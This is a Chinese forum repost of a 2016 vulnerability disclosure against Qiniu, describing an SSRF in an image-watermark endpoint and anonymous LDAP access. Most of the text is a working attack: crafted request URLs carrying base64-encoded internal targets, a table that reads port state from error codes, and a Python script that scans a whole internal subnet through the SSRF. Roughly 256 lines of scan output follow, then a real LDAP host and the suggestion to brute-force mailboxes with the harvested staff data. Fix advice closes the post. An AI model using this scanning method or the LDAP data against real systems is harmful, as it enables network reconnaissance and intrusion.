HanDs
管理员

[7月漏洞公开] 七牛某站SSRF可探测内网 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

七牛某站SSRF可探测内网+Ldap匿名访问

详细说明:

一、SSRF漏洞

有漏洞的貌似是一个测试站。

code 区域
http://demos.qiniu.com/demo/qimage/index.html



存在SSRF漏洞接口的作用是先获取远程的图片,然后把图片制作成水印覆盖在当前图片上,用百度的logo做演示,效果如下:

code 区域
http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast



2.png



image后边的那串base64编码是你要探测的IP和端口,如何知道内网的IP呢。这里探测到七牛的一个IP存在elasticsearch未授权访问。

1.PNG



可知内网中至少存在这样一个网段:

code 区域
172.30.251.168:9200



将http://172.30.251.168:9200编码为base64放在image后。

code 区域
http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast



如果当前IP存活且端口开放的话,会返回501错误。如探测 http://172.30.251.168:9200

6.png



如果当前IP不存活或者端口不开放的话,会返回502错误。如探测 http://172.30.251.168:1356

4.png



经过测试总结出以下规律。

code 区域
返回403——IP存活且端口开放,但是该目录禁止访问
返回404——IP存活且端口开放,但是不存在该图片
返回501——IP存活且端口开放
返回502——IP不存活或者端口不开放



这里为了方便测试,写了一个探测172.30.251网段80端口是否开放的脚本,返回501错误的就是IP存活且端口开放。当然如果再深入些,可以通过探测程序的默认logo或者favicon.ico来判断目标是什么应用。

code 区域
#coding=utf-8
'''
poc: qiniu_ssrf
url: http://demos.qiniu.com/demo/qimage/index.html
'''
import requests
import base64
from IPy import IP

mask = IP('172.30.251.0/24')
for ip in mask:
print ip
b64Domain = base64.b64encode('http://' + str(ip))
#print b64Domain
req = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)
print req.text + "\n"
qnfile = file('/tmp/qnscan.txt', 'a')
qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')
qnfile.close()



这是返回的结果

code 区域
172.30.251.0
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.1
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.2
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.3
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.4
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.5
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.6
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.7
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.8
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.9
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.10
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.11
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.12
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.13
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.14
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.15
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.16
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.17
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.18
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.19
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.20
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.21
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.22
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.23
{"error":"fetch image url failed and statusCode: 403"}

172.30.251.24
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.25
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.26
{"error":"fetch image url failed and statusCode: 403"}

172.30.251.27
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.28
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.29
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.30
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.31
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.32
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.33
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.34
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.35
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.36
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.37
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.38
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.39
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.40
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.41
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.42
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.43
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.44
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.45
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.46
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.47
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.48
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.49
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.50
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.51
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.52
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.53
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.54
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.55
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.56
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.57
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.58
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.59
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.60
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.61
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.62
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.63
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.64
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.65
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.66
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.67
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.68
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.69
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.70
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.71
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.72
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.73
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.74
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.75
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.76
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.77
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.78
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.79
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.80
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.81
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.82
{"error":"fetch image url failed and statusCode: 503"}

172.30.251.83
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.84
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.85
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.86
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.87
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.88
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.89
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.90
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.91
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.92
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.93
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.94
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.95
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.96
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.97
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.98
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.99
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.100
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.101
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.102
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.103
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.104
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.105
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.106
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.107
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.108
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.109
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.110
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.111
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.112
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.113
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.114
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}

172.30.251.115
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.116
{"error":"fetch image url failed and statusCode: 404"}

172.30.251.117
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.118
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.119
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.120
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.121
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.122
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.123
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.124
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.125
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.126
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.127
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.128
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.129
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.130
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.131
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.132
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.133
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.134
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.135
{"error":"fetch image url failed and statusCode: 404"}

172.30.251.136
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.137
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.138
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.139
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.140
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.141
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.142
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.143
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.144
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.145
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.146
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}

172.30.251.147
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.148
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.149
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.150
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.151
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.152
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.153
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.154
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.155
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.156
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.157
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.158
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.159
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.160
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.161
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.162
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.163
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.164
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.165
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.166
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.167
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.168
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.169
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.170
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.171
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.172
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.173
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.174
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.175
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.176
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.177
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.178
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.179
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.180
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.181
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.182
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.183
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.184
{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}

172.30.251.185
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.186
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.187
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.188
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.189
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.190
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.191
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.192
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.193
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.194
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.195
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.196
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.197
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.198
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.199
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.200
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.201
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.202
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.203
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.204
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.205
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.206
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.207
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.208
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.209
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.210
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.211
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.212
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.213
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.214
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.215
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.216
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.217
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}

172.30.251.218
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.219
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.220
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.221
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.222
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.223
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.224
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.225
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.226
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.227
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.228
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.229
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.230
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.231
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.232
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.233
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.234
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.235
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.236
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.237
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.238
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.239
{"error":"fetch image url failed and statusCode: 404"}

172.30.251.240
{"error":"fetch image url failed and statusCode: 403"}

172.30.251.241
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.242
{"error":"fetch image url failed and statusCode: 403"}

172.30.251.243
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.244
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.245
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.246
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.247
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.248
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.249
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.250
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.251
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.252
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.253
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.254
{"error":"fetch image url failed and statusCode: 502"}

172.30.251.255
{"error":"fetch image url failed and statusCode: 502"}





二、LDAP匿名访问

code 区域
IP:115.231.182.75
端口:389



可获取企业的所有人员信息,利用这些信息可以用来爆破邮箱或者使用ldap登录的应用。

5.png



在测试时,你们搭的一个洋葱的应用(115.231.182.75:8090)因为有漏洞,不小心测挂掉了,实在是抱歉。

漏洞证明:

见详细说明

修复方案:

1. SSRF漏洞,可以统一下返回错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态,且限制服务器访问的IP不能是内网IP。

2. Ldap漏洞,建议关掉Ldap的匿名访问功能。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
牛某站 S SR F 探测
#1楼
发帖时间:2016-7-6   |   查看数:0   |   回复数:0
游客组
快速回复